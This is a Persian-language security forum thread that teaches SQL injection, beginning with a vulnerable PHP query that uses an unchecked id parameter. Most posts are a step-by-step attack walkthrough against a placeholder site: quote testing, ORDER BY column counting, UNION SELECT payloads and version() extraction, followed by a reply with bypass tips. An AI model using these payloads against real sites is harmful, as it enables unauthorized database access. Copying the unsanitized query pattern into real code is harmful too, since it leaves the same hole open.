رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

در این تاپیک آموزش یکی از راههای هک و نفوذ سایت هارو که با نام Sql Injection Attack میشناسیم رو در این بخش قرار میدم و همچنین در این بخش هم آموزش تصویری هک سایت توسط

 

Sql Injection رو ضبط و قرارمیدم تا دوستان بتونند هم بصورت تئوری و هم بصورت عملی با این دسته از حملات آشنایی پیدا کنند و همجنین تارگت های آسیب پذیر جهت تمرین رو هم می تونید از

 

این بخش دریافت کنید و تست رو بر روی این تارگت ها انجام بدین .

 

 

پیروز باشین

 

 

 

 

.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

اولین بخش از آموزشهای باگ Sql Injection رو شروع می کنیم .

 

 

 باگ sql زمانی رخ می دهد که برنامه نویس داده های ورودی  ( Input Value ) را بدون کنترل مورد پردازش قرار داده و کد نویسی می کند و هکرها یا همون نفوذگرها از همین مشکل کد نویسی استفاده کرده

 

و  کنترل کامل سایت یا سرور مورد نظر را در دست میگیرند ونتیجه می گیریم هرکدی که از ورودی های کاربر برای جستجو در بانک اطلاعاتی  ( Database )  بدون بررسی و کنترل بکار برده شود احتمال

 

یک حمله موسوم به Sql Injection را در پی خواهد داشت .

 

 
همچنین ورودی ها می تواند از طریق URL باشد و چه از طریق متد GET و یا چه از طریق متد POST و جهت آشنایی شما یک نمونه کوئری که بدون بررسی ، از متغیرها استفاده میکند و دارای باگ

 

Sql Injection هست را با هم بررسی می کنیم :

<?php
$postid = $_GET['id'];
$result = mysqli_query($con,"SELECT * FROM `post` WHERE `id`=$postid");
?>

 به قطعه کد بالا دقت کنید و متوجه می شوید متغیر postid از ورودی id که در url میباشد مقداردهی میشود و همان ورودی که از URL را دریافت میکند به طور مستقیم مورد پردازش قرار می دهد و

 

به این معنی هست که نفوذگر می تواند به طور مستقیم دستورات خود را وارد نماید تا توسط سرور مورد پردازش قرار گیرد و این کار بسیار خطرناک خواهد بود و همچنین به مثال زیر دقت کنید :


http://www.Target.com/index.php?id=3

 

 

پایان بخش اول از سری آموزشهای حملات Sql Injection

 

.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 4 ماه بعد...

با اجازه از مدیر گرامی P0!s0nC0d3  بنده هم چند مرحله از این آموزش رو قرار می دم.

در این جلسه شما با سه مرحله از 6 مرحله آشنا می شید و در پست های اینده ادام ی مراحل رو قرار می دم

 

توجه کنید که این آموزش پایین ترین سطح هست وسعی شده که برای افراد تازه کار مناسب باشه.در آموزش های بعدی به طور کامل و مفصل در مورد سطح حرفه ای تر صحبت می کنیم.

اولین قدم:تست نفوذ پذیری سایت

نکته ما از تارگت فرضی زیر استفاده می کنیم.

http://www.site.com/news.php?id=6

برای تست نفوذ پذیری چند راه هست.

1-تست با استفاده از اسکنر هایی مانند اکانتیکس و وگا

2-اضافه کردن کوتیشن:

در روش دوم تارگت به این صورت نشون داده میشه

http://www.site.com/news.php?id=6

نکته:شما می تونید به جای کوتیشن از 27% هم استفاده کنید. به این صورت:

http://www.site.com/news.php?id=6%27

خب بعد از گذاشتن کوتیشن یکی از دو اتفاق زیر میفته

1-صفحه بعد از بالا اومدن هیچ تغییری نمی کنه.(سایت آسیب پذیری sql  ندارد)

2-صفحه ارور می ده و یا ناقص لود میشه(سایت آسیب پذیره)

مرحله ی دوم:پیدا کردن ستون ها وستون های آسیب پذیر.

برای این کار از دستور order by  استفاده می کنیم.(order by  از نظر لغوی به معنای دستور دادن به وسیله ی ...است) توجه کنید که باید در قسمت آخر ستون رو حدس بزنید.در عبارت زیر ستون حدسی رو 10 قرار دادم.

مثال:

--http://www.site.com/news.php?id=6+order+by+10

نکته:به جای + از space  هم می تونید استفاده کنید.اما برای این که گیج نشید بهتره از + استفاده کنید.

مثال:

http://www.site.com/news.php?id=6 order by 10—

خب الان دو حالت به وجود میاد:

1-      سایت بدون ارور نمایش داده میشه.

2-      سایت ارور sql می ده. و ما باید تعداد ستون هارو کم تر کنیم.

حالا فرض می کنیم سایت ما 5 تا ستون داره.(البته ما نمی دونیم.) پس به ای صورت میشه:

--http://www.site.com/news.php?id=6+order+by+10     ارور داد

--http://www.site.com/news.php?id=6+order+by+9     ارور می ده

--http://www.site.com/news.php?id=6+order+by+8      ارور می ده

--http://www.site.com/news.php?id=6+order+by+7      ارور می ده

--http://www.site.com/news.php?id=6+order+by+6      بدون ارور

--http://www.site.com/news.php?id=6+order+by+5     بدون ارور

و همین طور ادامه پیدا می کنه تا عدد 1.پس ما فهمیدیم تارگتمون(هدف) 5 تا ستون داره.

حالا باید با استفاده از دستور union select  تیبل آسیب پذیر رو پیدا کنیم.

مثال:

--http://www.site.com/news.php?id=6+union+select+1,2,3,4,5

خب با استفاده از این دستور ستون آسیب پذیر رو پیدا کردیم.بر فرض 3.

نکته:گاهی اوقات ممکنه یه سایت چند تا ستون آسیب پذیر داشته باشه.

مرحله ی سوم: پیدا کردن ورژن دیتابیس.

این مرحله بسیار مهمه چون طریقه ی هک کردن بعد از این مرحله به ورژن تارگت مربوطه.در این مقاله آموزش ورژن های بالای 5 رو یاد می گیرید.

برای پیدا کردن ورژن دیتابیس کافیه که به جای ستون آسیب پدیر version()  رو قرار بدید.

مثال:

--http://www.site.com/news.php?id=6+union+select+1,2,3,4,5

ستون 3  آسیب پدیر بود حالا به جاش version()  رو قرار می دیم به این صورت:

--http://www.site.com/news.php?id=6+union+select+1,2,version(),4,5

تارگت بعد از لود شدن ورژن رو به شما نشون می ده.بر فرض  5.1.2

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 10 ماه بعد...
  • 4 هفته بعد...
  • 5 ماه بعد...

سلام خسته نباشید اقا من یکم مشکل دارم مشکل من ر قسمت union+select+1,2,3,4,5 هستش ستون اسیب پذیرنده رو بهم نمیگه چیکار کنم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام خسته نباشید اقا من یکم مشکل دارم مشکل من ر قسمت union+select+1,2,3,4,5 هستش ستون اسیب پذیرنده رو بهم نمیگه چیکار کنم

درود

ببینید چندین راه داره

استفاده از distinct خیلی جا ها کمک میکنه

1 بایپس به روش های معمول

2 اینجکت در نقطه دیگه ای از تارگت

3 استفاده از روش قدیمیه اینجکت کردن

4 استفاده از روش post

  5 xpath injection

ولی مهم ترین روش نال کردن هست

and 0

پیروز باشید ...

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...